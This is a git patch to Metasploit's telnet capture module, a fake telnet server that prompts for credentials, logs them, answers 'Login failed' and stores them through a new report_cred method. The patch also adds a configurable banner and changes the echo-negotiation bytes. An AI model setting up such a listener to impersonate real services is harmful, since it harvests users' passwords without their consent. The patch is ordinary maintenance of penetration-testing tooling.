From fcf6212d2f3c6fd55dbf7d2b4cc0628c428175f0 Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Tue, 16 Jun 2015 16:37:36 +0500
Subject: [PATCH] Update telnet capture module to use the new creds API

---
 modules/auxiliary/server/capture/telnet.rb | 58 +++++++++++++++-------
 1 file changed, 41 insertions(+), 17 deletions(-)

diff --git a/modules/auxiliary/server/capture/telnet.rb b/modules/auxiliary/server/capture/telnet.rb
index 74d1e6cbf2..d1cabac7e4 100644
--- a/modules/auxiliary/server/capture/telnet.rb
+++ b/modules/auxiliary/server/capture/telnet.rb
@@ -30,7 +30,8 @@ class Metasploit3 < Msf::Auxiliary
 
     register_options(
       [
-        OptPort.new('SRVPORT', [ true, "The local port to listen on.", 23 ])
+        OptPort.new('SRVPORT', [true, 'The local port to listen on.', 23]),
+        OptString.new('BANNER', [false, 'The server banner to display when client connects'])
       ], self.class)
   end
 
@@ -39,6 +40,10 @@ class Metasploit3 < Msf::Auxiliary
     @state = {}
   end
 
+  def banner
+    datastore['BANNER'] || 'Welcome'
+  end
+
   def run
     print_status("Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...")
     exploit()
@@ -59,7 +64,6 @@ class Metasploit3 < Msf::Auxiliary
 
   def on_client_data(c)
     data = c.get_once
-
     return if not data
 
     offset = 0
@@ -72,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary
         # except for echoing which we WILL control for
         # the password
 
-        reply = "\xffX#{data[x + 2].chr}"
+        reply = "\xff#{data[x + 2].chr}"
 
         if @state[c][:pass] and data[x + 2] == 0x01
           reply[1] = "\xfb"
@@ -89,7 +93,7 @@ class Metasploit3 < Msf::Auxiliary
     end
 
     if not @state[c][:started]
-      c.put "\r\nWelcome.\r\n\r\n"
+      c.put "\r\n#{banner}\r\n\r\n"
       @state[c][:started] = true
     end
 
@@ -106,7 +110,7 @@ class Metasploit3 < Msf::Auxiliary
     if not @state[c][:gotuser]
       @state[c][:user] = data.strip
       @state[c][:gotuser] = true
-      c.put "\xff\xfb\x01" # WILL ECHO
+      c.put "\xff\xfc\x01" # WON'T ECHO
     end
 
     if @state[c][:pass].nil?
@@ -121,23 +125,43 @@ class Metasploit3 < Msf::Auxiliary
       c.put "\x00\r\n"
     end
 
-    report_auth_info(
-      :host      => @state[c][:ip],
-      :port      => datastore['SRVPORT'],
-      :sname     => 'telnet',
-      :user      => @state[c][:user],
-      :pass      => @state[c][:pass],
-      :source_type => "captured",
-      :active    => true
-    )
-
     print_status("TELNET LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
-
     c.put "\r\nLogin failed\r\n\r\n"
-
+    report_cred(
+      ip: @state[c][:ip],
+      port: datastore['SRVPORT'],
+      service_name: 'telnet',
+      user: @state[c][:user],
+      password: @state[c][:pass]
+    )
     c.close
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:user],
+      private_data: opts[:password],
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def on_client_close(c)
     @state.delete(c)
   end